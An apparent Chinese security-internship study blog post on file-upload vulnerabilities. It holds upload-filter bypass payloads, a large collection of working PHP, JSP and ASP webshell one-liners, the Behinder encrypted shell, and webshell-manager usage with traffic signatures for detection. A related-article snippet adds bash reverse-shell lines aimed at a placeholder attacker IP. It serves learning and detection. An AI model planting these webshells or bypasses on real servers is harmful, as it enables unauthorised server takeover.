信息安全毕业实训实习-Day7

最新推荐文章于 2024-09-11 22:34:57 发布
最新推荐文章于 2024-09-11 22:34:57 发布
阅读量716 收藏 18
点赞数 16
文章标签: 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67446464/article/details/141866084
版权

0. 图片马制作

准备一张图片,例如example.png,一个一句话木马 shell.php 。

一句话木马内容:

<?php phpinfo>

在powershell/cmd中,通过下面命令合成一个图片马shell.png

copy example.png /b + shell.php /a shell.png
# /b指定以二进制格式复制、合并文件,用于图像或者声音类文件
# /a:指定以ascii格式复制、合并文件用于txt等文本类文件

1. 文件上传防御手段及绕过手段

1.1 文件上传防御手段

  1. 将文件上传的目录设置为不可执行,确保服务器不受影响;
  2. 判断文件类型,结合使用MIME Type、后缀检查等方式。在文件类型检查中,强烈推荐白名单方式;
  3. 使用随机数改写文件名和文件路径,限制用户访问;
  4. 单独设置文件服务器的域名,解决同源策略问题;
  5. 图片二次渲染 ( 最变态的上传漏洞防御方式 , 基本上完全避免了文件上传漏洞 )
  6. 文件重命名 ( 如随机字符串或时间戳等方式 , 防止攻击者得到 webshell 的路径 )
  7. 隐藏上传文件路径,或将路径加密

1.2 文件上传绕过手段

1.2.1 修改MIME

MIME (Multipurpose Internet Mail Extensions),即多用金互联网邮件扩展,是一种用于标识文件内容类型的标准。这个标准最初是为电子邮件系统设计的,以允许在电子邮件消息中嵌入多种类型的数据,如图像、音频、视频文件以及非ASCII字符文本等。随着互联网的发展,MIME的应用范围逐渐扩展到其他互联网协议,如HTTP(用于在Web上传输数据)。

常用MIME如下:

xml文档

.xml

text/xml

普通文本

.txt

text/plain

PDF文档

.pdf

application/pdf

word文档

.doc/docx

application/msworc

PNG图片

.png

image/png

GIF图片

.gif

image/gif

JPEG图片

.jpeg

image/jpeg

tar文件

.tar

application/x-tar

如果服务端通过校验HTTP请求头部的content-type字段来判|断当前文件是否自己预期文件,我们可以通过修改请求包中的该字段来进行绕过。

1.2.2 修改前端js文件

开发者有时会增加前端校验代码,在上传文件之前进行前端校验文件,且禁用JS后接口将无法正常工作,无法禁用可以使用修改js文件的方式来进行绕过。常用的校验文件的函数的命名习惯有checkfile()或uploadcheck()等,需要根据经验判断。

1.2.3 修改文件后缀名

在上传时,后端有时会通过检查后端文件名进行过滤,如果存在疑似恶意文件的后缀名,将会直接重置连接或者对文件进行初始化处理。为了绕过这种情况,我们以php文件为例,假设后端禁止或会初始化所有php文件的上传,我们常通过使用大小与,双写与或利用中间件解析漏洞进行绕过。比如:

.Php .php2-7 .phps .pht .phtm .phtml .pgif .shtml .htaccess .phar .inc .hphp .ctp .module

1.2.4 filename换行

第一种:
content-disposition: form-data; name:"file"; filename:"1.p
hp"
第二种;
content-disposition form-data; name:"file"; file
name:"1.php"
第三种:
content-disposition: form-data; name:"file"; filename:
"1.php"

1.2.5 filename多等号

Content-Disposition: form-data; name="file"; filename==="а.php"

1.2.6 无双引号或单引号

第一种:Content-Disposition: form-data; name=file1; filename=a.php
第二种:Content-Disposition: form-data; name='file1'; filename="а.php"

1.2.7 多个filename

Content-Disposition: form-data; name='file1'; filename= ; filename="а.php"

1.2.8 windows特性

在windows中,如果文件名+ ::$DATA 会自动把 ::$DATA 之后的数据当成文件流进行处理,不会检测后缀名,且保持 ::$DATA 之前的文件名,它的目的就是不检查后缀名。

Content-Disposition: form-data; name='file'; filename="а.php::$DATA"

1.2.9 二次渲染绕过

一般是在使用上传图片后,发现webshell无法连接,再次下载后发现文件被损坏或被初始化,可以通过010editor查看被损坏的部分,寻找不会被初始化部分,将webshell插入到该部分

2. 文件上传常用一句话木马

2.1 文件上传漏洞

文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。

2.2 产生文件上传漏洞的原因

  • 对于上传文件的后缀名(扩展名)没有做较为严格的限制
  • 对于上传文件的MIMETYPE(用于描述文件的类型的一种表述方法) 没有做检查
  • 权限上没有对于上传的文件目录设置不可执行权限,(尤其是对于shebang类型的文件)
  • 对于web server对于上传文件或者指定目录的行为没有做限制

2.3 一句话木马——PHP

<?php @eval($_POST['r00ts']);?> 
<?php phpinfo();?>
<?php @eval($_POST[cmd]);?>
<?php @eval($_REQUEST[cmd]);?>
<?php assert($_REQUEST[cmd]); ?>
<?php //?cmd=phpinfo() @preg_replace("/abc/e",$_REQUEST['cmd'],"abcd"); ?>

<?php 
//?cmd=phpinfo();
$func =create_function('',$_REQUEST['cmd']);
$func();
?>

<?php
//?func=system&cmd=whoami
$func=$_GET['func'];
$cmd=$_GET['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
//print_r($new_array);
?>

<?php 
//?cmd=phpinfo()
@call_user_func(assert,$_GET['cmd']);
?>

<?php 
//?cmd=phpinfo()
$cmd=$_GET['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
?>

<?php 
//?func=system&cmd=whoami
$cmd=$_GET['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
?>

<?php usort($_GET,'asse'.'rt');?> php环境>=<5.6才能用
<?php usort(...$_GET);?>  php环境>=5.6才能用
<?php eval($_POST1);?> 
<?php if(isset($_POST['c'])){eval($_POST['c']);}?> 
<?php system($_REQUEST1);?> 
<?php ($_=@$_GET1).@$_($_POST1)?> 
<?php eval_r($_POST1)?> 
<?php @eval_r($_POST1)?>//容错代码 
<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句 
<?$_POST['c']($_POST['cc']);?> 
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>

2.4 一句话木马——JSP

<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%> 
提交客户端 
<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>

2.5 一句话木马——ASP

<%eval(Request.Item["r00ts"],”unsafe”);%>

<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%> 

<%execute(request(“1″))%> 

<scriptrunat=server>execute request(“1″)</script> 不用'<,>‘的asp一句话

2.6 一句话木马——aspx

<scriptrunat=”server”>WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y (“add6bb58e139be10″);</script> 

<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script> 

<%eval request(chr(35))%>  不用双引号的一句话

2.7 文件上传漏洞总结大全

参考链接:文件上传漏洞 (上传知识点、题型总结大全-upload靶场全解)_upload靶场题型-CSDN博客

3. 三种webshell管理工具的使用方法(演示使用该工具连接webshell及抓取流量包进行分析特征)

3.1 中国蚁剑(AntSword)

官网下载地址:https://github.com/AntSwordProject/

特点:中国蚁剑支持自定义加密,但shell不稳定,且对jsp兼容性比较差;

3.1.1 中国蚁剑连接一句话木马

1. 上传一句话木马

<?php
eval($_POST["good"]);

2. 在蚁剑中右键选择“添加数据”

3. 输入刚刚一句话木马的地址。注意,连接密码要和一句话木马中的一致。点击测试连接

4. 双击点击刚刚添加的数据管理,成功。

3.1.2 Burp Suite抓取蚁剑数据包

1. 设置蚁剑中的代理

左上角点击AntSword打开代理设置,选择手动设置代理后填写代理服务器和端口(Burp Suite监听的端口),填写完成后保存即可生效。

2. 在蚁剑的虚拟终端执行命令,即可抓取到蚁剑的数据包。

3. Burp Suite成功抓取到蚁剑的数据包

3.1.3 蚁剑流量特征

  • 使用url加密
  • user-agent的值为antsword字段
  • 请求中存在eval,可能出现拼接或者大小写情况
  • 请求体中存在@ini_set(url解密)
  • 参数中大量存在 0X字段(弱特征)

特征码为:

data:("display_errors" AND "set_time_limit(0)")
user-agent:"antsword/v2.0"

3.2 哥斯拉(Godzilla)

下载链接:Release v3.03-godzilla · BeichenDream/Godzilla · GitHub

特点:基于流量,http全加密的webshell工具。看不出有明显的攻击特征,需要结合流量。找到哥斯拉webshell上传成功的流量来进行分析和判断,另外该工具自带了一些插件模块,实现了写无文件webshell等强大的功能,可以伪造UA头和Accept头,消除请求包和响应包中的特征。

3.2.1 哥斯拉连接一句话木马

1. 上传一句话木马

<?php
eval($_POST["pass"]);

2. 点击左上角的目标,点击添加

输入配置信息,注意,url地址是刚刚上传一句话木马的地址,密钥是一句话木马中的pwd,有效载荷和加密器选择PHP。

3. 配置信息填好后点击测试连接,查看是否成功。

3.2.2 Burp Suite抓取哥斯拉数据包

1. 配置Godzilla代理信息,填写代理服务器和端口(Burp Suite监听的端口),填写完成后保存即可。

2. 通过木马进入命令行执行命令,即可用Burp Suite抓取到哥斯拉的数据包。

3. Burp Suite成功抓取到哥斯拉的数据包

3.2.3 哥斯拉Godzilla流量特征

  • Cookie中有一个非常关键的特征,最后会有个分号 ; 。
  • 响应体的数据有一定特征,哥斯拉会把一个32位的md5字符串按照一半拆分,分别放在base64编码的数据的前后两部分。整个响应包的结构体征为:md5前十六位+base64+md5后十六位
Accept:text/html,application/xhtml+xml,application/xml:q=0.9,image/webp,/;q0.8 (固定的)
  • 哥斯拉会建立三次tcp连接(强特征)

3.3 冰蝎(Behinder)

下载链接:https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_11

3.3.1 冰蝎(Behinder)上传一句话木马

1. 上传一句话木马

<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b"; 
    $bs="base64_"."decode";
	$after=$bs($data."");
	for($i=0;$i<strlen($after);$i++) {
    	$after[$i] = $after[$i]^$key[$i+1&15]; 
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>

2. 配置冰蝎(Behinder)shell信息,其中URL地址为刚刚上传一句话木马的地址,脚本类型为PHP,传输协议为base64,点击保存即可。

3.3.2 Burp Suite抓取冰蝎数据包 

1. 配置冰蝎的代理信息。点击左上角的代理,点击设置代理。填写代理服务器和端口(Burp Suite监听的端口),选择启用,完成后保存即可。

2. 通过刚刚创建的shell,单击右键,点击打开,即可进入。

3. 进入命令行执行命令,即可用Burp Suite抓取到冰蝎的数据包

4. 3. Burp Suite成功抓取到冰蝎的数据包

3.3.3 冰蝎(Behinder)流量特征

流量特征:不同版本的冰蝎流量特征会有区别,我们以4.0为例

  • 3.0流量动态aes加密,一般http包头中contentent-type为application/octet-stream
  • 4.0流量动态aes加密,一般http包头中content-type为application/x-www-form-form-urlencoded
  • 使用长连接,默认情况下,请求头和响应头里会带有connection:keep-alive;
  • 连接的端口,每次连接使用本地端口在49700左右(就是比较大的端口)
  • Accept:字段中存在 application/json,text/javaseript,*/*;q=0.01
  • UA头是冰蝎内置的,有规律的(10种内置ua头,随机选择)
  • 大量的aes加密(弱特征)

4. 文件上传无回显如何查找webshell地址

4.1 字典爆破

根据经验,文件上传后,文件有时会直接以文件名的形式放在在专属的upload目录中,通常是/upload/1.php,有时会加上当前日期,比如/upload/2024-01-01/1.php,或者其他不修改文件名但是存放到其他目录的形式。这个时候我们通常需要一个专属字典进行访问。

4.2 时间戳枚举

在渗透测试过程中,有些文件上传后,会以上传时间的时间戳为名称来进行重命名,我们需要根据时间戳来命名。通常我们会以响应包中的Date字段为参照时间戳进行枚举。

python代码获取时间戳

from datetime import datetime

# 从字符串转换
date_str = "2024-09-01 12:00:00"
date_obj = datetime.strptime(date_str, "%Y-%m-%d %H:%M:%S")
timestamp = date_obj.timestamp()
print(timestamp)

# 直接使用datetime.now()获取时间戳
now_timestamp = datetime.now().timestamp()
print(now_timestamp)

在powershell中获取当前时间戳

powershell -c Get-Date -Format yyyyMMddHHmmssfff			# 获取年月日时分秒毫秒
20240903154527916
powershell -c Get-Date -Format yyyyMMddHHmm						# 获取年月日时分
202409031549

获取时间戳后我们通常枚举时间戳的后5位或后6位数字。

在线的时间戳转换网站:在线时间戳转换工具

5. 文件上传表单的无参/有参情况下构造表单 

5.1 未知参数构造(万能)表单

POST /xxx.xxx HTTP/1.1
Host: a.com
Content-Length: 192 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBVxOSADFbKWNOvVM
Connection: close 
------WebKitFormBoundaryBVxOSADFbKWNOvVM
Content-Disposition: form-data; name= "a";filename= "1.php" 
Content-Type: application/octet-stream 

111 
------WebKitFormBoundaryBVxOSADFbKWNOvVM--

白嫖刘老师的课件截图(主要是不会js):

5.2 构造表单参数

POST /xxxx HTTP/1.1
Host: a.com
Content-Length: 318 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBVxOSADFbKWNOvVM
Connection: close 

------WebKitFormBoundaryBVxOSADFbKWNOvVM
Content-Disposition: form-data; name="name"; 
Content-Type: application/octet-stream

111 
------WebKitFormBoundaryBVxOSADFbKWNOvVM
Content-Disposition: form-data; name="FilePath"; 
Content-Type: application/octet-stream

222 
------WebKitFormBoundaryBVxOSADFbKWNOvVM--

6. upload-labs靶场(pass06~10)

靶场太怪,难搞!

超超已经
关注
  • 16
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传漏洞
nigo134的博客
03-22 4047
原理 这主要看一些文件上传的代码有没有 严格限制用户上传的文件类型,比如,只可以上传.jpg|.png|.gif文件,但是由于代码不严谨,或者只在前端验证这个文件的格式等等,造成了攻击者可以上传任意PHP文件,自定义文件。 危害 可以通过这个漏洞上传后门文件,webshell,可以直接获取网站权限,然后获取服务器的提权,获取内网权限,或去用户信息等等。属于高危漏洞。 文件木马 ASP <%eval request( "x")%> <%execute request(...
Godzilla(哥斯拉)安装与使用
剁椒鱼头没剁椒的博客
12-22 7615
这里介绍可以直接看作者的对软件的介绍,这里就不复述了,复述也是类似抄一遍,没准还没说对。
DVWA靶场学习
RoboTerh的博客
10-23 179
Brute force low级别 暴力破解,根据自己的字典爆破或者进行信息搜集之后进行脚本的编写 分析源码: <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); //进行md5加密 // Check the database //查
信息安全毕业实训实习-Day9
m0_67446464的博客
09-05 1154
Cobalt Strike是一种针对网络攻击和渗透测试的工具套件,最初是由Raphael Mudge开发的。它被广泛使用于红队行动、渗透测试和攻击模拟等领域。拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具,因此广受技术大佬的喜爱。Cobalt Strike提供了一系列功能,包括社交工程、恶意软件传播、漏洞利用、远程控制、数据搜集和横向渗透等。
信息安全毕业实训实习-Day4
m0_67446464的博客
08-30 1003
反射型跨站脚本漏洞,最普遍的类型。用户访问服务器-跨站链接-返回跨站代码。这种攻击往往具有一次性。攻击者通过邮件等形式将包含XSS代码的链接发送给正常用户,当用户点击时,服务器接受该用户的请求并进行处理,然后把带有XSS的代码发送给用户。用户浏览器解析执行代码,触发XSS漏洞。反射型XSS攻击原理。
信息安全毕业实训实习-Day3
m0_67446464的博客
08-29 672
xray 为单文件二进制文件,无依赖,也无需安装,下载后直接使用xray 跨平台支持,请下载时选择需要的版本下载。注意: 不要直接 clone 仓库,xray 并不开源,仓库内不含源代码,直接下载构建的二进制文件即可。
信息安全毕业实训实习-Day11
最新发布
m0_67446464的博客
09-11 587
3W即Who、What、Why、1H即How,做应急响应要带着疑问来做事,一定要收集清楚这些信息。网络拓扑是怎么样的?需求是啥?发生了什么事?你能做什么?用户用了什么产品?产品版本多少?病毒库版本多少?多少主机中了?主机是普通pc还是服务器?服务器是做什么的?......信息收集越多,对应急响应越有利。做应急响应免不了要做信息收集和取证的,但这里是有一定的先后顺序的,即最容易丢失的证据,应该最先收集,其它的依次类推。做应急响应,主要是抓关键证据,即要素,这些要素包括样本,流量,日志,进程及模块,内存,启动项
信息安全毕业实训实习-Day1
m0_67446464的博客
08-27 1046
SD-WAN(Software-Defined Wide Area Network)是一种新兴的网络技术,它通过软件定义的方式管理和优化内外网之间的连接。SD-WAN的目标是提高网络的灵活性、可靠性和成本效益,同时简化网络管理。随着云计算和物联网技术的发展,SD-WAN的应用越来越广泛,成为企业和组织网络基础设施的重要组成部分。
信息安全毕业实训实习-Day10
m0_67446464的博客
09-08 540
1. 通过"ip a"命令,查看IP地址。2. 通过nmap工具,扫描同一内网下存活的主机。
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 807
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 608
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 985
本文主要介绍网络安全认识与学习规划
内网安全:反弹shell
8888的博客
09-10 890
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2。powercat -c 攻击机器IP -p 9999 -v -ep。
消防指挥中心控制台:守护安全的关键枢纽
JiaDeLi_console的博客
09-11 194
它不仅是信息的接收者,更是行动的发起者,协调各方资源,确保消防救援工作高效、有序地进行。消防指挥中心控制台是消防救援工作的关键环节,它以先进的设计、强大的功能和不断升级的科技,为守护人民生命财产安全发挥着不可替代的作用。在未来,随着科技的进一步发展,相信消防指挥中心控制台将变得更加智能、高效,为构建更加安全的社会环境贡献更大的力量。同时,控制台还配备了舒适的座椅,为指挥人员提供良好的工作条件。在消防应急救援的战场上,嘉德立消防指挥中心控制台犹如一座坚实的堡垒,发挥着至关重要的作用。二、先进的设计与功能。
第143天:内网安全-权限维持&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon
weixin_71529930的博客
09-06 860
案例一: 权限维持-域环境&单机版-自启动自启动路径加载路径地址把木马程序上传到目标文件夹重启服务器自启动服务加载。
WEB攻防-ASP安全&MDB下载植入&IIS短文件名&写权限&解析
2301_78384345的博客
09-08 460
可以通过扫描得到数据库文件路径,或者如果有网站源码,可以根据默认配置(目标服务器没有该配置的情况下)扫描到之后,用下面的工具(不支持win10)把木马文件put到服务器,上传后修改文件名为可解析文件。通过留言写入后门,在通过菜刀访问.asp时,就会执行后门。ASP-中间件-IIS短文件名探针-安全漏洞。ASP-中间件-IIS文件上传解析-安全漏洞。ASP-中间件-IIS配置目录读写-安全配置。ASP-数据库-ASP后门植入连接。2、ASP-数据库下载&植入;ASP-数据库-MDB默认下载。
Java安全-动态加载字节码
柠檬i的博客
09-07 1188
众所周知,不同平台、不通CPU的计算机指令有差异,但因为Java是一门跨平台的编译型语言,所以这些差异对于上层开发者来说是透明的,上层开发者只需要将自己的代码编译一次,即可运行在不同平台的JVM虚拟机中。
端口安全老化细节
qq_25467441的博客
09-06 890
绝对老化会在设定时间后强制性地老化掉MAC地址,而相对老化则会在接收到新数据包时重置老化时间。MAC地址表老化时间累计到30秒了,因为是30秒的时候学到的,到一分钟的时候正好学了30秒。举例来说,如果在1:30学习到MAC地址,但在1:30又接收到来自同一MAC地址的数据包,老化时间会重置为0,从这一时刻重新开始计时。举例来说,现在的时间是0:00:00,0:00:30秒的时候学到了一个安全MAC地址表。相对老化模式下,老化时间也是设定的,但是在接口学习到新的数据包时,老化计时会重置。
c++利用循环链表解决约瑟夫问题
09-13
约瑟夫问题是一个经典的数学问题,其描述是:有n个人围成一圈,从某个人开始报数,每报到m的人出列,直到最后剩下一个人为止。这个问题可以使用循环链表来解决。 首先,我们可以创建一个循环链表,其中每个节点表示一个人,节点之间通过next指针相连接,形成一个环。链表的长度为n,即有n个人。 然后,我们定义一个指针current,初始指向链表的头节点。开始报数后,每报到m的人,我们就将current指向该节点的下一个节点,即将该节点从链表中删除。重复这个过程,直到只剩下一个节点为止。 为了实现这个过程,我们可以使用一个while循环,判断链表是否只剩下一个节点。在循环中,我们首先找到需要删除的节点,即找到current指向的节点的前一个节点。然后,我们将该节点的next指针指向需要删除节点的下一个节点,即将需要删除的节点从链表中删除。 最后,当循环结束后,链表中只剩下一个节点,即为问题的解。我们可以输出该节点对应的人的信息,即为最后剩下的人。 总的来说,利用循环链表解决约瑟夫问题的关键是使用一个指针current来标记当前节点,并通过修改节点的next指针来删除节点。这样,我们可以模拟人们报数的过程,直到最后剩下一个人。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值